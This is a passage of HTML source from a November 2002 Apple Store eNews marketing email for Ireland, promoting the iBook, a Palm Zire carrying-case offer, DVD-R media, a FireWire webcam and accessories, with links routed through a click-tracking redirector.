 				&lt;td&gt;&lt;A HREF="http://www.komtools.net/tracker_court/routage.fdml?F=asenews-november&amp;D=http%3A%2F%2Fstore.apple.com%2FApple%2FWebObjects%2Firlstore%3Ffamily%3DiBook&amp;P=ie_gStory2"&gt;&lt;img src="http://email.euro.apple.com/store/asnews/november2002/ie/images/illustr2.jpg" align="left" alt="illustr2" border="0"&gt;&lt;/A&gt;&lt;font size="1" face="Arial, Geneva, Helvetica, sans-serif"&gt;The iBook is the perfect holiday gift for your favourite 
 student, portable user, or anyone in need of the ultimate 
 in light, compact, portable computing. The battery lasts as long 
 as 5 hours between charges on the 12.1-inch (diagonal) display 
 model and as long as 6 hours on the 14.1-inch 
 (diagonal) model. The high-resolution displays on both models are outstanding, 
 and it comes out of the box with all the 
 hardware features and software you need to plug directly into 
 everything from your digital camera to the Internet. Altogether it&amp;#146;s 
 a no compromises, &amp;#147;your life to go&amp;#148; marvel, and now 
 it&amp;#146;s even faster (up to 800MHz) and comes with a 
 Mobility Radeon 7500 graphics card that can contain up to 
 32MB of SDRAM. With pricing starting as low as 1.330 Euro inc VAT, 
 there&amp;#146;s never been a better time to buy.&lt;br&gt;
 				  &lt;/font&gt;&lt;/td&gt;
 			  &lt;/tr&gt;
 			&lt;/table&gt;
 			&lt;table width="420" border="0" cellspacing="0" cellpadding="0"&gt;
 			  &lt;tr&gt; 
 				&lt;td&gt;&lt;img src="http://email.euro.apple.com/store/asnews/november2002/ie/images/spacer.gif" width="310" height="1"&gt;&lt;/td&gt;
 				&lt;td width="110" align="right"&gt;&lt;A HREF="http://www.komtools.net/tracker_court/routage.fdml?F=asenews-november&amp;D=http%3A%2F%2Fstore.apple.com%2FApple%2FWebObjects%2Firlstore%3Ffamily%3DiBook&amp;P=ie_gStory2"&gt;&lt;img src="http://email.euro.apple.com/store/asnews/november2002/ie/images/learn_more.gif" width="104" height="28" border="0" alt="Learn More"&gt;&lt;/a&gt;&lt;/td&gt;
 			  &lt;/tr&gt;
 			  &lt;tr&gt; 
 				&lt;td colspan="2"&gt;&lt;a name="story3"&gt;&lt;/a&gt;&lt;img src="http://email.euro.apple.com/store/asnews/november2002/ie/images/horizontal_line.gif" width="420" height="13"&gt;&lt;/td&gt;
 			  &lt;/tr&gt;
 			&lt;/table&gt;
 		    &lt;table width="420" border="0" cellspacing="0" cellpadding="0"&gt;
 			  &lt;tr&gt; 
 				&lt;td&gt;&lt;a href="#top"&gt;&lt;img src="http://email.euro.apple.com/store/asnews/november2002/ie/images/title3.gif" width="420" height="32" border="0" alt="A carrying case for the first 100 Zire purchasers"&gt;&lt;/a&gt;&lt;/td&gt;
 			  &lt;/tr&gt;
 			  &lt;tr&gt; 
 				&lt;td&gt;&lt;A HREF="http://www.komtools.net/tracker_court/routage.fdml?F=asenews-november&amp;D=http%3A%2F%2Fstore.apple.com%2FApple%2FWebObjects%2Firlstore%3FproductLearnMore%3DSB5447&amp;P=ie_gStory3"&gt;&lt;img src="http://email.euro.apple.com/store/asnews/november2002/ie/images/illustr3.jpg" align="left" alt="illustr3" border="0"&gt;&lt;/A&gt;&lt;font size="1" face="Arial, Geneva, Helvetica, sans-serif"&gt;Stay organised with less effort. Use the Palm Zire handheld 
 to keep events, appointments, names and phone numbers all in 
 one place so you'll always know where to find them. 
 And it's small and light, so you can take your 
 information with you wherever you go. You can use iSync 
 to synchronise your Address Book contacts and iCal calendar and 
 To Do information on your Mac with the contacts and 
 calendar on your Palm Zire. And if you&amp;#146;re of of 
 the first 100 to order, a carrying case will be 
 included with your Palm Zire.&lt;br&gt;
 				  &lt;/font&gt;&lt;/td&gt;
 			  &lt;/tr&gt;
 			&lt;/table&gt;
 			&lt;table width="420" border="0" cellspacing="0" cellpadding="0"&gt;
 			  &lt;tr&gt; 
 				&lt;td&gt;&lt;img src="http://email.euro.apple.com/store/asnews/november2002/ie/images/spacer.gif" width="310" height="1"&gt;&lt;/td&gt;
 				&lt;td width="110" align="right"&gt;&lt;A HREF="http://www.komtools.net/tracker_court/routage.fdml?F=asenews-november&amp;D=http%3A%2F%2Fstore.apple.com%2FApple%2FWebObjects%2Firlstore%3FproductLearnMore%3DSB5447&amp;P=ie_gStory3"&gt;&lt;img src="http://email.euro.apple.com/store/asnews/november2002/ie/images/learn_more.gif" width="104" height="28" border="0" alt="Learn More"&gt;&lt;/a&gt;&lt;/td&gt;
 			  &lt;/tr&gt;
 			  &lt;tr&gt; 
 				&lt;td colspan="2"&gt;&lt;img src="http://email.euro.apple.com/store/asnews/november2002/ie/images/horizontal_line.gif" width="420" height="13"&gt;&lt;/td&gt;
 			  &lt;/tr&gt;
 			&lt;/table&gt;
 		    &lt;a name="spotlight"&gt;&lt;/a&gt;&lt;img src="http://email.euro.apple.com/store/asnews/november2002/ie/images/spacer.gif" width="420" height="10"&gt; 
 			&lt;table width="420" border="0" cellspacing="0" cellpadding="0"&gt;
 			  &lt;tr&gt;
 				&lt;td width="200" valign="top"&gt;
 				  &lt;table width="200" border="0" cellspacing="0" cellpadding="0"&gt;
 					&lt;tr&gt; 
 					  &lt;td align="center" valign="top"&gt;&lt;a href="#top"&gt;&lt;img src="http://email.euro.apple.com/store/asnews/november2002/ie/images/title4.gif" width="198" height="48" border="0" alt="5 DVD-R"&gt;&lt;/a&gt;&lt;/td&gt;
 					&lt;/tr&gt;
 					&lt;tr&gt;
 					  &lt;td align="center" valign="top"&gt;&lt;A HREF="http://www.komtools.net/tracker_court/routage.fdml?F=asenews-november&amp;D=http%3A%2F%2Fstore.apple.com%2FApple%2FWebObjects%2Firlstore%3FproductLearnMore%3DM8405&amp;P=ie_g3part1"&gt;&lt;img src="http://email.euro.apple.com/store/asnews/november2002/ie/images/illustr4.jpg" alt="illustr4" border="0"&gt;&lt;/A&gt;&lt;/td&gt;
 					&lt;/tr&gt;
 					&lt;tr&gt; 
 					  &lt;td align="center" valign="top"&gt;&lt;font size="1" face="Arial, Geneva, Helvetica, sans-serif"&gt;The ideal media for the superdrive at an amazing price. 
 Use iDVD and DVD Studio Pro to store your creations 
 on these 4.7 GB discs.&lt;br&gt;
 						&lt;br&gt;
 						&lt;/font&gt;&lt;/td&gt;
 					&lt;/tr&gt;
 					&lt;/table&gt;
 				&lt;/td&gt;
 				&lt;td width="10"&gt;&lt;img src="http://email.euro.apple.com/store/asnews/november2002/ie/images/spacer.gif" width="10" height="1"&gt;&lt;/td&gt;
 				&lt;td background="http://email.euro.apple.com/store/asnews/november2002/ie/images/vertical_line.gif" width="1" valign="top"&gt;&lt;img src="http://email.euro.apple.com/store/asnews/november2002/ie/images/vertical_line.gif" width="1" height="8"&gt;&lt;/td&gt;
 				&lt;td width="10"&gt;&lt;img src="http://email.euro.apple.com/store/asnews/november2002/ie/images/spacer.gif" width="10" height="1"&gt;&lt;/td&gt;
 				&lt;td width="199" valign="top"&gt;
 				  &lt;table width="199" border="0" cellspacing="0" cellpadding="0"&gt;
 					&lt;tr&gt; 
 					  &lt;td align="center" valign="top"&gt;&lt;a href="#top"&gt;&lt;img src="http://email.euro.apple.com/store/asnews/november2002/ie/images/title5.gif" width="198" height="48" border="0" alt="Unibrain Fire-i"&gt;&lt;/a&gt;&lt;/td&gt;
 					&lt;/tr&gt;
 					&lt;tr&gt;
 					  &lt;td align="center" valign="top"&gt;&lt;A HREF="http://www.komtools.net/tracker_court/routage.fdml?F=asenews-november&amp;D=http%3A%2F%2Fstore.apple.com%2FApple%2FWebObjects%2Firlstore%3FproductLearnMore%3DT4791&amp;P=ie_g3part2"&gt;&lt;img src="http://email.euro.apple.com/store/asnews/november2002/ie/images/illustr5.jpg" alt="illustr5" border="0"&gt;&lt;/A&gt;&lt;/td&gt;
 					&lt;/tr&gt;
 					&lt;tr&gt; 
 					  &lt;td align="center" valign="top"&gt;&lt;font size="1" face="Arial, Geneva, Helvetica, sans-serif"&gt;Enjoy uncompromised quality for video conferencing. No driver needed with 
 Mac OS X v.10.2 and QuickTime Broadcaster.&lt;br&gt;
 						&lt;br&gt;
 						&lt;/font&gt;&lt;/td&gt;
 					&lt;/tr&gt;
 					&lt;/table&gt;
 				&lt;/td&gt;
 			  &lt;/tr&gt;
 			&lt;/table&gt;
 		    &lt;table width="420" border="0" cellspacing="0" cellpadding="0"&gt;
 			  &lt;tr&gt; 
 				&lt;td width="200" align="center"&gt;&lt;table width="180" border="0" cellspacing="0" cellpadding="0"&gt;
 					&lt;tr&gt;
 					  &lt;td align="center"&gt;&lt;A HREF="http://www.komtools.net/tracker_court/routage.fdml?F=asenews-november&amp;D=http%3A%2F%2Fstore.apple.com%2FApple%2FWebObjects%2Firlstore%3FproductLearnMore%3DM8405&amp;P=ie_g3part1"&gt;&lt;img src="http://email.euro.apple.com/store/asnews/november2002/ie/images/learn_more.gif" width="104" height="28" border="0" alt="Learn More"&gt;&lt;/a&gt;&lt;/td&gt;
 					&lt;/tr&gt;
 				  &lt;/table&gt;
 					  &lt;br&gt;&lt;font size="1" face="Arial, Geneva, Helvetica, sans-serif"&gt;&lt;b&gt;35 Euro inc VAT&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;
 				&lt;td width="10"&gt;&lt;img src="http://email.euro.apple.com/store/asnews/november2002/ie/images/spacer.gif" width="10" height="1"&gt;&lt;/td&gt;
 				&lt;td background="http://email.euro.apple.com/store/asnews/november2002/ie/images/vertical_line.gif" width="1" valign="top"&gt;&lt;img src="http://email.euro.apple.com/store/asnews/november2002/ie/images/vertical_line.gif" width="1" height="8"&gt;&lt;/td&gt;
 				&lt;td width="10"&gt;&lt;img src="http://email.euro.apple.com/store/asnews/november2002/ie/images/spacer.gif" width="10" height="1"&gt;&lt;/td&gt;
 				&lt;td width="199" align="center"&gt;&lt;table width="180" border="0" cellspacing="0" cellpadding="0"&gt;
 					&lt;tr&gt;
 					  &lt;td align="center"&gt;&lt;A HREF="http://www.komtools.net/tracker_court/routage.fdml?F=asenews-november&amp;D=http%3A%2F%2Fstore.apple.com%2FApple%2FWebObjects%2Firlstore%3FproductLearnMore%3DT4791&amp;P=ie_g3part2"&gt;&lt;img src="http://email.euro.apple.com/store/asnews/november2002/ie/images/learn_more.gif" width="104" height="28" border="0" alt="Learn More"&gt;&lt;/a&gt;&lt;/td&gt;
 					&lt;/tr&gt;
 				  &lt;/table&gt;
 					  &lt;br&gt;&lt;font size="1" face="Arial, Geneva, Helvetica, sans-serif"&gt;&lt;b&gt;129 Euro inc VAT&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;
 			  &lt;/tr&gt;
 			&lt;/table&gt;
 		  &lt;/td&gt;
 		  &lt;td width="13"&gt;&lt;img src="http://email.euro.apple.com/store/asnews/november2002/ie/images/spacer.gif" width="13" height="1"&gt;&lt;/td&gt;
 		  &lt;td width="140" valign="top"&gt; 
 			&lt;table width="140" border="0" cellspacing="0" cellpadding="0"&gt;
 			  &lt;tr&gt; 
 				&lt;td colspan="3"&gt;&lt;img src="http://email.euro.apple.com/store/asnews/november2002/ie/images/whatsnew.gif" width="140" height="23"&gt;&lt;img src="http://email.euro.apple.com/store/asnews/november2002/ie/images/spacer.gif" width="0" height="0"&gt;&lt;/td&gt;
 			  &lt;/tr&gt;
 			  &lt;tr&gt; 
 				&lt;td width="3" background="http://email.euro.apple.com/store/asnews/november2002/ie/images/table_left.gif"&gt;&lt;img src="http://email.euro.apple.com/store/asnews/november2002/ie/images/table_left.gif" width="3" height="3"&gt;&lt;/td&gt;
 				&lt;td width="134"&gt; 
 				  &lt;table width="134" border="0" cellspacing="0" cellpadding="0"&gt;
 					&lt;tr&gt; 
 					  &lt;td colspan="2" valign="top"&gt;&lt;img src="http://email.euro.apple.com/store/asnews/november2002/ie/images/spacer.gif" width="134" height="5"&gt;&lt;img src="http://email.euro.apple.com/store/asnews/november2002/ie/images/spacer.gif" width="0" height="0"&gt;&lt;/td&gt;
 					&lt;/tr&gt;
 					&lt;tr&gt; 
 					  &lt;td width="19" valign="top"&gt;&lt;img src="http://email.euro.apple.com/store/asnews/november2002/ie/images/arrow.gif" width="19" height="14"&gt;&lt;/td&gt;
 					  &lt;td valign="top" width="115"&gt;&lt;font face="Arial, Geneva, Helvetica, sans-serif" size="1"&gt;&lt;a href="#story1" class="TOPAPPS"&gt;New PowerBook&lt;/a&gt;&lt;/font&gt;&lt;/td&gt;
 					&lt;/tr&gt;
 					&lt;tr&gt; 
 					  &lt;td valign="top"&gt;&lt;img src="http://email.euro.apple.com/store/asnews/november2002/ie/images/arrow.gif" width="19" height="14"&gt;&lt;/td&gt;
 					  &lt;td valign="top"&gt;&lt;font face="Arial, Geneva, Helvetica, sans-serif" size="1"&gt;&lt;a href="#story2" class="TOPAPPS"&gt;New iBook&lt;/a&gt;&lt;/font&gt;&lt;/td&gt;
 					&lt;/tr&gt;
 					&lt;tr&gt; 
 					  &lt;td valign="top"&gt;&lt;img src="http://email.euro.apple.com/store/asnews/november2002/ie/images/arrow.gif" width="19" height="14"&gt;&lt;/td&gt;
 					  &lt;td valign="top"&gt;&lt;font face="Arial, Geneva, Helvetica, sans-serif" size="1"&gt;&lt;a href="#story3" class="TOPAPPS"&gt;Palm Zire Offer&lt;/a&gt;&lt;/font&gt;&lt;/td&gt;
 					&lt;/tr&gt;
 					&lt;tr&gt; 
 					  &lt;td valign="top"&gt;&lt;img src="http://email.euro.apple.com/store/asnews/november2002/ie/images/arrow.gif" width="19" height="14"&gt;&lt;/td&gt;
 					  &lt;td valign="top"&gt;&lt;font size="1" face="Arial, Geneva, Helvetica, sans-serif"&gt;&lt;a href="#spotlight" class="TOPAPPS"&gt;5 DVD-R Media Pack&lt;/a&gt;&lt;/font&gt;&lt;/td&gt;
 					&lt;/tr&gt;
 					&lt;tr&gt; 
 					  &lt;td valign="top"&gt;&lt;img src="http://email.euro.apple.com/store/asnews/november2002/ie/images/arrow.gif" width="19" height="14"&gt;&lt;/td&gt;
 					  &lt;td valign="top"&gt;&lt;font size="1" face="Arial, Geneva, Helvetica, sans-serif"&gt;&lt;a href="#spotlight" class="TOPAPPS"&gt;Fire-i FireWire Webcam&lt;/a&gt;&lt;/font&gt;&lt;/td&gt;
 					&lt;/tr&gt;
 				  &lt;/table&gt;
 				  &lt;img src="http://email.euro.apple.com/store/asnews/november2002/ie/images/spacer.gif" width="134" height="3"&gt;&lt;/td&gt;
 				&lt;td width="3" background="http://email.euro.apple.com/store/asnews/november2002/ie/images/table_right.gif"&gt;&lt;img src="http://email.euro.apple.com/store/asnews/november2002/ie/images/table_right.gif" width="3" height="3"&gt;&lt;/td&gt;
 			  &lt;/tr&gt;
 			  &lt;tr&gt; 
 				&lt;td colspan="3"&gt;&lt;img src="http://email.euro.apple.com/store/asnews/november2002/ie/images/search.gif" width="140" height="17"&gt;&lt;img src="http://email.euro.apple.com/store/asnews/november2002/ie/images/spacer.gif" width="0" height="0"&gt;&lt;/td&gt;
 			  &lt;/tr&gt;
 			  &lt;tr&gt; 
 				&lt;td width="3" background="http://email.euro.apple.com/store/asnews/november2002/ie/images/table_left.gif"&gt;&lt;img src="http://email.euro.apple.com/store/asnews/november2002/ie/images/table_left.gif" width="3" height="3"&gt;&lt;/td&gt;
 				&lt;td&gt; 
 				  &lt;table width="134" border="0" cellspacing="0" cellpadding="0"&gt;
 					&lt;tr&gt; 
 					  &lt;form action="http://store.apple.com/Apple/WebObjects/irlstore"&gt;
 						&lt;td&gt;&lt;img src="http://email.euro.apple.com/store/asnews/november2002/ie/images/spacer.gif" width="3" height="1"&gt; 
 						  &lt;input type="text" name="jknr" size="12" maxlength="30" class="searchbox"&gt;&lt;input type="hidden" name="cat" value="All"&gt;
 						&lt;/td&gt;
 						&lt;td width="30" height="26"&gt; 
 						  &lt;input type="image" border="0" src="http://email.euro.apple.com/store/asnews/november2002/ie/images/search_button.gif" ONFOCUS="this.blur();"&gt;
 						&lt;/td&gt;
 					  &lt;/form&gt;
 					&lt;/tr&gt;
 				  &lt;/table&gt;
 				&lt;/td&gt;
 				&lt;td width="3" background="http://email.euro.apple.com/store/asnews/november2002/ie/images/table_right.gif"&gt;&lt;img src="http://email.euro.apple.com/store/asnews/november2002/ie/images/table_right.gif" width="3" height="3"&gt;&lt;/td&gt;
 			  &lt;/tr&gt;
 			  &lt;tr&gt; 
 				&lt;td colspan="3"&gt;&lt;img src="http://email.euro.apple.com/store/asnews/november2002/ie/images/hotdeals.gif" width="140" height="23"&gt;&lt;img src="http://email.euro.apple.com/store/asnews/november2002/ie/images/spacer.gif" width="0" height="0"&gt;&lt;/td&gt;
 			  &lt;/tr&gt;
 			  &lt;tr&gt; 
 				&lt;td colspan="3"&gt;&lt;a href="http://www.komtools.net/tracker_court/routage.fdml?F=asenews-november&amp;D=http%3A%2F%2Fwww.apple.com%2Fie%2Fpromo%2Foffice%2F&amp;P=ie_sticker1"&gt;&lt;img src="http://email.euro.apple.com/store/asnews/november2002/ie/images/promo_office.gif" width="140" border="0"&gt;
 &lt;/a&gt;&lt;a href="http://www.komtools.net/tracker_court/routage.fdml?F=asenews-november&amp;D=http%3A%2F%2Fpromo.euro.apple.com%2Fpromo%2Fdigital%5Fsouvenirs%2Fuk%2F&amp;P=ie_sticker2"&gt;&lt;img src="http://email.euro.apple.com/store/asnews/november2002/ie/images/promo_nikon.gif" width="140" border="0"&gt;
 &lt;/a&gt;
 				&lt;a href="http://www.komtools.net/tracker_court/routage.fdml?F=asenews-november&amp;D=http%3A%2F%2Fpromo.euro.apple.com%2Fpromo%2Fchristmaspack%2Fie%2Findex.html&amp;P=ie_sticker3"&gt;&lt;img src="http://email.euro.apple.com/store/asnews/november2002/ie/images/promo_christmaspack.gif" width="140" border="0"&gt;
 &lt;/a&gt;&lt;/td&gt;
 			  &lt;/tr&gt;
 			  &lt;tr&gt; 
 				&lt;td colspan="3"&gt;&lt;img src="http://email.euro.apple.com/store/asnews/november2002/ie/images/top_apps.gif" width="140"&gt;&lt;img src="http://email.euro.apple.com/store/asnews/november2002/ie/images/spacer.gif" width="0" height="0"&gt;&lt;/td&gt;
 			  &lt;/tr&gt;
 			  &lt;tr&gt; 
 				&lt;td width="3" background="http://email.euro.apple.com/store/asnews/november2002/ie/images/table_left.gif"&gt;&lt;img src="http://email.euro.apple.com/store/asnews/november2002/ie/images/table_left.gif" width="3" height="3"&gt;&lt;/td&gt;
 				&lt;td&gt; 
 				  &lt;table width="134" border="0" cellspacing="0" cellpadding="0"&gt;
 					&lt;tr&gt; 
 					  &lt;td colspan="2"&gt;&lt;img src="http://email.euro.apple.com/store/asnews/november2002/ie/images/spacer.gif" width="134" height="5"&gt;&lt;img src="http://email.euro.apple.com/store/asnews/november2002/ie/images/spacer.gif" width="0" height="0"&gt;&lt;/td&gt;
 					&lt;/tr&gt;
 					&lt;tr&gt; 
 					  &lt;td width="19"&gt;&lt;img src="http://email.euro.apple.com/store/asnews/november2002/ie/images/square.gif" width="19" height="8"&gt;&lt;/td&gt;
 					  &lt;td width="115" class="topapps"&gt;&lt;A HREF="http://www.komtools.net/tracker_court/routage.fdml?F=asenews-november&amp;D=http%3A%2F%2Fstore.apple.com%2FApple%2FWebObjects%2Firlstore%3FproductLearnMore%3DM8433&amp;P=ie_gMacApp1"&gt;&lt;font face="Arial, Geneva, Helvetica, sans-serif" size="1"&gt;Battery Crystal iBook 12.1&amp;#148;&lt;/font&gt;&lt;/a&gt;&lt;/td&gt;
 					&lt;/tr&gt;
 					&lt;tr&gt; 
 					  &lt;td&gt;&lt;img src="http://email.euro.apple.com/store/asnews/november2002/ie/images/square.gif" width="19" height="8"&gt;&lt;/td&gt;
 					  &lt;td&gt;&lt;A HREF="http://www.komtools.net/tracker_court/routage.fdml?F=asenews-november&amp;D=http%3A%2F%2Fstore.apple.com%2FApple%2FWebObjects%2Firlstore%3FproductLearnMore%3DM8956&amp;P=ie_gMacApp2"&gt;&lt;font face="Arial, Geneva, Helvetica, sans-serif" size="1"&gt;Battery iBook 12.1&amp;#148;&lt;/font&gt;&lt;/a&gt;&lt;/td&gt;
 					&lt;/tr&gt;
 					&lt;tr&gt; 
 					  &lt;td&gt;&lt;img src="http://email.euro.apple.com/store/asnews/november2002/ie/images/square.gif" width="19" height="8"&gt;&lt;/td&gt;
 					  &lt;td&gt;&lt;A HREF="http://www.komtools.net/tracker_court/routage.fdml?F=asenews-november&amp;D=http%3A%2F%2Fstore.apple.com%2FApple%2FWebObjects%2Firlstore%3FproductLearnMore%3DM8665&amp;P=ie_gMacApp3"&gt;&lt;font face="Arial, Geneva, Helvetica, sans-serif" size="1"&gt;Battery iBook 14&amp;#148;&lt;/font&gt;&lt;/a&gt;&lt;/td&gt;
 					&lt;/tr&gt;
 					&lt;tr&gt; 
 					  &lt;td&gt;&lt;img src="http://email.euro.apple.com/store/asnews/november2002/ie/images/square.gif" width="19" height="8"&gt;&lt;/td&gt;
 					  &lt;td&gt;&lt;A HREF="http://www.komtools.net/tracker_court/routage.fdml?F=asenews-november&amp;D=http%3A%2F%2Fstore.apple.com%2FApple%2FWebObjects%2Firlstore%3FproductLearnMore%3DM8244&amp;P=ie_gMacApp4"&gt;&lt;font face="Arial, Geneva, Helvetica, sans-serif" size="1"&gt;Battery PowerBook&lt;/font&gt;&lt;/a&gt;&lt;/td&gt;
 					&lt;/tr&gt;
 					&lt;tr&gt; 
 					  &lt;td&gt;&lt;img src="http://email.euro.apple.com/store/asnews/november2002/ie/images/square.gif" width="19" height="8"&gt;&lt;/td&gt;
 					  &lt;td&gt;&lt;A HREF="http://www.komtools.net/tracker_court/routage.fdml?F=asenews-november&amp;D=http%3A%2F%2Fstore.apple.com%2FApple%2FWebObjects%2Firlstore%3FproductLearnMore%3DM8943&amp;P=ie_gMacApp5"&gt;&lt;font face="Arial, Geneva, Helvetica, sans-serif" size="1"&gt;Power Adaptor&lt;/font&gt;&lt;/a&gt;&lt;/td&gt;
 					&lt;/tr&gt;
 					&lt;tr&gt; 
 					  &lt;td&gt;&lt;img src="http://email.euro.apple.com/store/asnews/november2002/ie/images/square.gif" width="19" height="8"&gt;&lt;/td&gt;
 					  &lt;td&gt;&lt;A HREF="http://www.komtools.net/tracker_court/routage.fdml?F=asenews-november&amp;D=http%3A%2F%2Fstore.apple.com%2FApple%2FWebObjects%2Firlstore%3FproductLearnMore%3DM8661&amp;P=ie_gMacApp6"&gt;&lt;font face="Arial, Geneva, Helvetica, sans-serif" size="1"&gt;Display Adaptor&lt;/font&gt;&lt;/a&gt;&lt;/td&gt;
 					&lt;/tr&gt;
 					&lt;tr&gt; 
 					  &lt;td&gt;&lt;img src="http://email.euro.apple.com/store/asnews/november2002/ie/images/square.gif" width="19" height="8"&gt;&lt;/td&gt;
 					  &lt;td&gt;&lt;A HREF="http://www.komtools.net/tracker_court/routage.fdml?F=asenews-november&amp;D=http%3A%2F%2Fstore.apple.com%2FApple%2FWebObjects%2Firlstore%3FproductLearnMore%3DT4843&amp;P=ie_gMacApp7"&gt;&lt;font face="Arial, Geneva, Helvetica, sans-serif" size="1"&gt;64MB Handydrive&lt;/font&gt;&lt;/a&gt;&lt;/td&gt;
 					&lt;/tr&gt;
 					&lt;tr&gt;
 					  &lt;td&gt;&lt;img src="http://email.euro.apple.com/store/asnews/november2002/ie/images/square.gif" width="19" height="8"&gt;&lt;/td&gt;
 					  &lt;td&gt;&lt;A HREF="http://www.komtools.net/tracker_court/routage.fdml?F=asenews-november&amp;D=http%3A%2F%2Fstore.apple.com%2FApple%2FWebObjects%2Firlstore%3Ffamily%3DiPod&amp;P=ie_gMacApp8"&gt;&lt;font face="Arial, Geneva, Helvetica, sans-serif" size="1"&gt;iPod&lt;/font&gt;&lt;/a&gt;&lt;/td&gt;
 					&lt;/tr&gt;					
 					&lt;tr&gt;
 					  &lt;td&gt;&lt;img src="http://email.euro.apple.com/store/asnews/november2002/ie/images/square.gif" width="19" height="8"&gt;&lt;/td&gt;
 					  &lt;td&gt;&lt;A HREF="http://www.komtools.net/tracker_court/routage.fdml?F=asenews-november&amp;D=http%3A%2F%2Fstore.apple.com%2FApple%2FWebObjects%2Firlstore%3Ffamily%3DAccessories&amp;P=ie_gMacApp9"&gt;&lt;font face="Arial, Geneva, Helvetica, sans-serif" size="1"&gt;More Accessories&lt;/font&gt;&lt;/a&gt;&lt;/td&gt;
 					&lt;/tr&gt;
 				  &lt;/table&gt;
 				  &lt;img src="http://email.euro.apple.com/store/asnews/november2002/ie/images/spacer.gif" width="134" height="7"&gt;&lt;/td&gt;
 				&lt;td width="3" background="http://email.euro.apple.com/store/asnews/november2002/ie/images/table_right.gif"&gt;&lt;img src="http://email.euro.apple.com/store/asnews/november2002/ie/images/table_right.gif" width="3" height="3"&gt;&lt;/td&gt;
 			  &lt;/tr&gt;
 			  &lt;tr&gt; 
 				&lt;td colspan="3"&gt;&lt;img src="http://email.euro.apple.com/store/asnews/november2002/ie/images/sep-bottom.gif"&gt;&lt;img src="http://email.euro.apple.com/store/asnews/november2002/ie/images/spacer.gif" width="0" height="0"&gt;&lt;/td&gt;
 			  &lt;/tr&gt;
 			  &lt;tr&gt; 
 				&lt;td colspan="3"&gt;
 				&lt;/td&gt;
 			  &lt;/tr&gt;
 			&lt;/table&gt;
 		  &lt;/td&gt;
 		  &lt;td&gt;&lt;img src="http://email.euro.apple.com/store/asnews/november2002/ie/images/spacer.gif" width="10" height="1"&gt;&lt;/td&gt;
 		&lt;/tr&gt;
 	  &lt;/table&gt;
 	  &lt;img src="http://email.euro.apple.com/store/asnews/november2002/ie/images/spacer.gif" width="596" height="10"&gt;&lt;br&gt;
 	&lt;/td&gt;
 	&lt;td width="1" background="http://email.euro.apple.com/store/asnews/november2002/ie/images/grey_dot.gif" NOWRAP&gt;&lt;IMG SRC="http://email.euro.apple.com/store/asnews/november2002/ie/images/grey_dot.gif" HEIGHT="1" WIDTH="1"&gt;&lt;/td&gt;
   &lt;/tr&gt;
   &lt;!--End Meat &amp; Potatoes--&gt;
   &lt;!--Start Cap Span--&gt;
   &lt;tr&gt; 
 	&lt;td colspan="3"&gt;&lt;img src="http://email.euro.apple.com/store/asnews/november2002/ie/images/bottom_cap.gif" width="598" height="14"&gt;&lt;/td&gt;
   &lt;/tr&gt;
   &lt;!--End Cap Span--&gt;
   &lt;!--Start Shell Guide --&gt;
   &lt;tr&gt; 
 	&lt;td width="1" height="1"&gt;&lt;img src="http://email.euro.apple.com/store/asnews/november2002/ie/images/spacer.gif"&gt;&lt;/td&gt;
 	&lt;td width="596" height="1"&gt;&lt;img src="http://email.euro.apple.com/store/asnews/november2002/ie/images/spacer.gif"&gt;&lt;/td&gt;
 	&lt;td width="1" height="1"&gt;&lt;img src="http://email.euro.apple.com/store/asnews/november2002/ie/images/spacer.gif"&gt;&lt;/td&gt;
   &lt;/tr&gt;
   &lt;!--End Shell Guide --&gt;
 &lt;/table&gt;
 &lt;!--START Ts and Cs Section--&gt;&lt;br&gt;
 &lt;br&gt;
 	&lt;table width="598" border="0" cellspacing="0" cellpadding="0" align="center"&gt;
 	&lt;!--Start Shell Guide --&gt;
 		&lt;tr&gt;
 			&lt;td width="1" height="1"&gt;&lt;img src="http://email.euro.apple.com/store/asnews/november2002/ie/images/spacer.gif"&gt;&lt;/td&gt;
 			&lt;td width="5" height="1"&gt;&lt;img src="http://email.euro.apple.com/store/asnews/november2002/ie/images/spacer.gif"&gt;&lt;/td&gt;
 			&lt;td width="586" height="1"&gt;&lt;img src="http://email.euro.apple.com/store/asnews/november2002/ie/images/spacer.gif"&gt;&lt;/td&gt;
 			&lt;td width="5" height="1"&gt;&lt;img src="http://email.euro.apple.com/store/asnews/november2002/ie/images/spacer.gif"&gt;&lt;/td&gt;
 			&lt;td width="1" height="1"&gt;&lt;img src="http://email.euro.apple.com/store/asnews/november2002/ie/images/spacer.gif"&gt;&lt;/td&gt;
 		&lt;/tr&gt;
 	&lt;!--End Shell Guide --&gt;
 	&lt;!--Start Banner Span--&gt;
 		&lt;tr&gt;
 			&lt;td colspan="5" background="http://email.euro.apple.com/store/asnews/november2002/ie/images/bg_bug.gif"&gt;&lt;img src="http://email.euro.apple.com/store/asnews/november2002/ie/images/top_cap_blank.gif" width="598" height="13"&gt;&lt;img src="http://email.euro.apple.com/store/asnews/november2002/ie/images/spacer.gif" width="0" height="0"&gt;&lt;/td&gt;
 		&lt;/tr&gt;
 	&lt;!--End Banner Span--&gt;
 	&lt;!--Start Ts and Cs--&gt;
 		&lt;tr&gt;
 			&lt;td width="1" background="http://email.euro.apple.com/store/asnews/november2002/ie/images/grey_dot.gif" NOWRAP&gt;&lt;IMG SRC="http://email.euro.apple.com/store/asnews/november2002/ie/images/grey_dot.gif" HEIGHT="1" WIDTH="1"&gt;&lt;/td&gt;
 			&lt;td width="5" NOWRAP&gt;&lt;/td&gt;
 			&lt;td width="586" BGCOLOR="#FFFFFF" ALIGN="center"&gt;&lt;IMG SRC="http://email.euro.apple.com/store/asnews/november2002/ie/images/spacer.gif" HEIGHT="1" WIDTH="586"&gt;
 &lt;FONT SIZE="1" face="Arial, Geneva, Helvetica, sans-serif"&gt;&lt;BLOCKQUOTE&gt;Apple Store eNews 
 		is a free, monthly, subscription-based email publication from Apple. If 
 		you'd prefer not to receive the newsletter anymore, click the &amp;quot;Unsubscribe&amp;quot; 
 		link below and update your profile or send an eMail reply with &amp;quot;Unsubscribe&amp;quot; 
 		in the subject line of the email reply.&lt;br&gt;
 		&lt;br&gt;Some products or promotions are not available in all countries. Visit your local Apple Store or call 1800 92 38 98 for more information. Prices are estimated retail prices and are listed in local currencies including VAT. Product specifications are subject to change.&lt;br&gt;&lt;br&gt;
 Apple does not make any representation about the features or functionality of non-Apple products. Any questions or requests for support relating to non-Apple products should be addressed to the manufacturer. Support line and/or support web site are mentioned in the documentation enclosed with the product.&lt;br&gt;
 		&lt;br&gt;
